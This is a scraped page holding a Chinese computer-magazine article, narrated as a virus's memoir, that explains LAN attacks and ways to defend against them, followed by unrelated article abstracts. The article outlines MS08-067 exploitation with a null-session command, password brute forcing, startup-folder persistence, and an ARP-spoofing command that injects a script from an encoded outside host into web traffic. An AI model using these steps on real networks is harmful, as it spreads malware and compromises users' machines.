老病毒的自述:局域网中的风光

来源 :电脑爱好者 | 被引量 : 0次 | 上传用户:angie133
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  X(局域网型病毒)是生活在局域网中的程序,每天自由穿梭在各种局域网中,虽然时常被赶走,但它仍然是家族兴旺,声势显赫,这天年迈的老X把孙子Y叫到身边,给他讲述当年的故事。
  
  网络大补贴
  1.ARPhttp://baike.baidu.com/view/32698.htm
  2.远程溢出http://wenwen.soso.com/z/q108787618.htm?
  rq=42139518&ri=3&uid=0&ch=w.xg.llyjj
  3.密码字典http://zhidao.baidu.com/question/26458265.html
  4.莫里斯蠕虫 http://baike.baidu.com/view/497489.html?wtp=tt
  
  X的风流往事——辉煌的家族史
  X把Y揽在怀里,把自己的“丰功伟绩”和家族历史吹嘘起来。
  在很久以前那个电脑稀缺的年代,人们都不相信病毒能够从一台电脑转移到另外一台电脑,X小时侯扮演了“莫里斯蠕虫”,第一次从一台电脑传播到另外一台电脑。局域网慢慢地发展起来,他靠“感染快,扩散广,难以清除”三板斧,攻城略地,那是惊天地泣鬼神。巅峰时期家族可谓是人丁兴旺啊,冲击波、震荡波、魔鬼波三人结合电脑弱点,攻击江湖无人能敌;熊猫烧香兄弟社工专家,一手密码穷举绝活,满城尽是三炷香;ARP鼻祖老当益壮,铁齿铜牙忽悠网关没话说。
  咱们的生存之本是局域网,局域网内存在大量的漏洞,我就会带着兄弟们牢牢抓住局域网的弱点通过局域网口令破解、漏洞攻击、ARP攻击等方法在网内快速传递。同时咱们会对抗杀毒软件,让安装的杀毒软件失去它的作用,即使有人发现自己中毒并通过系统还原或者格式化的方法清除了病毒体,但是只要我X在局域网内任一台电脑上还存活着,避过风头后就能使整个网络重新被感染。这时的局域网,轻则降低速度,重则网络崩溃,破坏服务器信息,那叫一个过瘾呐!
  
  X的血泪史——与战警A的几场惨战
  老X回忆完自己的辉煌,欣喜之余也想起了当年年少轻狂,运用自己的独门秘笈,虽做了不少大事,不过也因此与杀毒软件进行了几场恶战。这不又讲开故事了!
  
  恶战一 扫荡波系统弱点攻击
  当时我学会了一招“扫荡波”,主要用来进行漏洞攻击,简单地说就是钻局域网电脑操作系统的空子传播自身,虽然功力比不上前辈冲击波、震荡波但是造成的破坏可不小。
  一方面局域网的电脑常常会因为病毒问题或者其他原因重新安装系统,如果不及时安装严重级别的系统补丁,就有可能因为严重的系统漏洞让咱们得以生存并控制整个局域网。
  真实再现
  那天,我找到一台存在漏洞的电脑,首先获取本地IP地址,通过端口扫描器扫描所在网段的445端口,看看哪些电脑的445端口是活跃的(见图1)
  


  (1)
  hacktcp 127.0.0.1 127.0.0.255127.0.0.1 445,然后我就利用MS08-67漏洞,尝试着攻击存在漏洞的主机,仅需三步我就得手了。
  1.建议空连接,net use \\ip\ipc$ /user: "" ""。
  2.连接管道/pipe/brower,相当于本地一个共享,可以让远程计算机读写的文件。
  3.调用存在漏洞的NetPathCanonicalize函数,构造一个畸形字符串,导致远程溢出从而下载一个病毒到远程主机并执行。
  于是我将方法教给其他兄弟,大家好好乐了一场,可谁知好景不长,战警(杀软)出现了,一个是360安全卫士,一个是金山清理专家,他们偏偏用“手”里的漏洞扫描工具对系统进行漏洞检测和修复,使得很多兄弟丧失。
  
  恶战二 系统弱口令
  听完这段故事,Y有点遗憾,X怕坏了兴致,就说“爷爷当然没那么笨了,我还有新招呢!现在Ghost系统很流行,局域网内的电脑也大都不设置密码,或者密码很简单,我们可以通过口令破解入侵局域网的系统从而上传病毒文件执行,那时爷爷就学了一招“熊猫烧香”,目的就是来个山寨版的‘人肉’搜索,可以扫描整个局域网,看看哪些电脑活动着,再通过一个密码字典进行暴力破解密码,成功后获得权限就能为所欲为了。”
  真实再现
  有一天,我悄悄溜进了一台电脑,惊喜地发现局域网众多主机都存在弱口令(密码强度低)问题,我使出“熊猫烧香”,先遍历感染者所在局域网,寻找可以连接上的“肉鸡”,尝试利用密码字典对可以连接上的电脑进行攻击,以求暴力破解账号,比如,用户名“Administrator 1234”、“Admin 123456”。然后我就将一些病毒兄弟复制到目标电脑的开机启动文件夹(比如“C:\Documents and Settings\All Users\Start Menu\Programs\Startup”目录),让大家在电脑重新启动的时候运行起来。
  
  这时旁边的一病毒兄弟听不下去了,嘴里嘟囔着,后来不还是被这几招给破解了吗?
  
  1.修改计算机默认用户名,并设置高强度密码,类似这样的用户密码组合:@zhaobudao7878,yigemima@163。
  2.关闭计算机一些存在风险的服务程序,并重命名一些可能被黑客利用的文件,比如“ftp.exe”常被黑客从远程下载病毒到肉鸡电脑。
  3.安装一款反黑客防火墙比如卡巴斯基个人防火墙,可以很好地防范一些低级黑客入侵电脑。
  
  恶战三 真假网关
  X收拾下被打击的心情,重新教导起Y来:“当病毒,还想不被杀,那就得不断学习,提高自己的技能,那会儿我就是花费了好长时间才钻研出‘ARP欺骗’的秘诀,变身ARP病毒,风光了好一阵。一旦成功入侵系统我就会伪装成网关,并劫持网络内所有HTTP通讯,并且强行在HTTP数据包中插入带有病毒程序的网页链接,使得局域网内任意一台电脑在访问正常网页时,都会自动下载木马病毒。也就是说,只要局域网内有一台计算机感染了该木马,局域网内所有的计算机就都有可能被感染上木马病毒。”
  
  真实再现
  那天,我正玩得起兴,突然杀毒软件开始报警,反复提示发现病毒,说有ARP病毒不断地发包进行攻击:他通过网络分析软件WinPcap提供的网络分析功能,劫持网络内所有HTTP通讯,发现了我在电脑里留下的文件:“C:\WINDOWS\SYSTEM32\drivers\npf.sys”。我哪管这个,继续在HTTP数据包中插入带有恶意代码的网页链接,使得局域网内任意一个用户在访问正常网页时都会同时执行恶意网页代码(见图2),这招就是“wacldlt.exe -idx 0 -ip 192.168.0.2-192.168.0.254 -port 80 -insert "<script language=javascript src=http://%77%2E%63%36%36%64%2E%63%6E/lg.js></script>”。这段命令的意思是监听80端口(上网的默认端口),当局域网的用户通过80端口访问网络的时候,就在网页代码插入一个恶意构造的框架结构。接下来自然是老套路,在中招电脑中找一些可被利用的漏洞,触发它们,然后让病毒兄弟们都过来,一起“娱乐”。
  


  (2)
  当然也都是风光往事了,现在ARP风火墙都可以有效防范,像金山ARP防火墙、彩影ARP防火墙之类的软件防火墙都是死敌,Y你可要记清哦!
其他文献
人员是企业管理的核心,作为人力资源的员工,利用Office 2007就可以轻松创建人事信息库,整理出全体公司员工的基本信息,并将员工的联系方式添加到Outlook联系人中,以便于与员工进行及时的通讯联络。    要解决的问题:  1 如何把列标题转换为表的标题,在浏览数据的同时,保持标题始终可见?  2 如何才能让“人事信息库”像一个系统那样,通过对话框来输入或查询员工信息?  3 如何根据“入职
期刊
摘 要:在知识不断更新的新时代,学会学习是最重要的能力素养。2016年9月正式发布的《中国学生发展核心素养》,其中“学会学习”素养是核心中的核心,主要是指学生在学习意识形成、学习方式方法选择、学习进程评估调控等方面的综合表现。学习策略是学生学习素养的具体外在表现,我校的学生学习策略研究与实践活动,特点鲜明,可操作性强,自主学习策略助推学生学习能力提升效果明显,走在市域前列,给同类农村初中提供了示范
期刊
最近,受金融危机影响,公司内部降低成本的呼声越来越大,有没有办法在打印机上节约呢?当然!在办公室打印上可以节省不少呢。    小提示  虽然说家用型激光打印机,在纸张的适应性、纸盒容量、打印负荷量、墨粉盒容量、走纸机构等方面并不适合高强度办公室打印,但如果打印量不算太大(每月几千张)、正确使用、勤于维护,家用激光打印机也完全可以胜任。但购买时要先了解该型号是否容易灌粉。    节省打印之只选对的 
期刊
有人将电脑操作归结为单击时代,每天我们要单击多少个按钮呢?不用问,数字一定小不了。每天我们需要做像文件夹的访问,应用程序调用等看似简单但却烦琐的操作,往往为了找到需要的东西而多点好几次按钮,如果我们能够把一些常用的东西放到手边,随时调用,自然效率大增,快人一倍!    常用文件夹哪里放?  跟随常用工具  大家平时使用电脑会有一些常用文件夹,这些文件夹的访问频率非常高。但它们往往分布在各个磁盘分区
期刊
摘 要:阅读经典名著有助于大学生提升自身文化素养。随着网络和信息技术的快速发展,经典名著阅读逐渐被大学生淡化。针对此现状,本文以河北省某大学为例开展调查,了解大学生群体对经典名著的喜爱程度及对传统文化的重视程度,分析当前大学生在经典名著阅读方面存在的问题及问题产生的根源,并结合本次调查结果为学校的专业培养方案及课程设置提出合理化建议。  关键词:大学生;经典名著;阅读;调查  中图分类号:G64
期刊
摘 要:近几年,随着课程改革的不断深化和变迁,人们已经逐渐开始摆脱千篇一律的教学方式,逐渐注重起学生的全面发展和个性培养,而在这一过程中,分层教学法成为了课堂教学改革中的一个重要途径和关键热点,也是实现教学创新的重要手段。  关键词:分层教学;小学英语;教学改革;实施策略;分析  中图分类号:G62 文献标识码:A 文章编号:1673-9132(2018)24-0118-02  DOI:10.16
期刊
摘 要:探究性学习是学生全面发展的核心,探究性学习是一种重要而有效的学习方式。因此,高中思想政治教师要给学生提供充足的探究空间,让学生在手脑并用的探究活动中,体验探究中的乐趣,提升探究的能力。  关键词:高中政治课;探究性学习;特点;可行性;环节  中图分类号:G63 文献标识码:A 文章编号:1673-9132(2018)24-0111-02  DOI:10.16657/j.cnki.issn1
期刊
果果:眼下,毕业班的同学都开始忙论文了。大学几年的研究能力如何,论文见分晓!俗话说“借鉴精华是美德”,但是“借鉴”过了头,可就是“抄袭”啦!抄袭?抄袭!怎么一听到这个词就直哆嗦?想拿出响当当的论文来吗?请跟我来。    老师是如何查抄袭的?  知己知彼,百战不贻。  1一般老师的评判标准是在百度、Google中不能轻易搜到。有老师笑称“关键字搜索结果前100页都看过了”,你打算从101页抄起吗?其
期刊
大家好,我是北京师范大学计算机社团——师大人工作室的社长肖遥,今天我主要和大家交流一些计算机社团活动申请和进行过程中的小技巧。    策划:语音群聊软件来帮忙  首先决定要举办一个什么样的活动。比如我们社团每学期都会举办的室外维修、电脑装机咨询活动,某些厂商的校园活动也会找到我们。开会的形式多种多样,可以找个时间把社团负责人召集到一个地方开会,但是由于大家平时课业较多,部分人的意见无法交流,所以我
期刊
摘 要:词汇是英语教学的基础,词汇掌握的好与坏直接影响了学生的英语成绩以及与英语相关的各方面的能力。因此,英语教师不但要引导学生学会快速识记词汇,掌握联想记忆法、口诀记忆法、同根记忆法和归类记忆法等灵活的词汇学习方法,而且要让他们学会活学活用,全面提升英语运用能力。  关键词:英语词汇;困扰因素;识记方法;活学活用  中图分类号:G63 文献标识码:A 文章编号:1673-9132(2018)24
期刊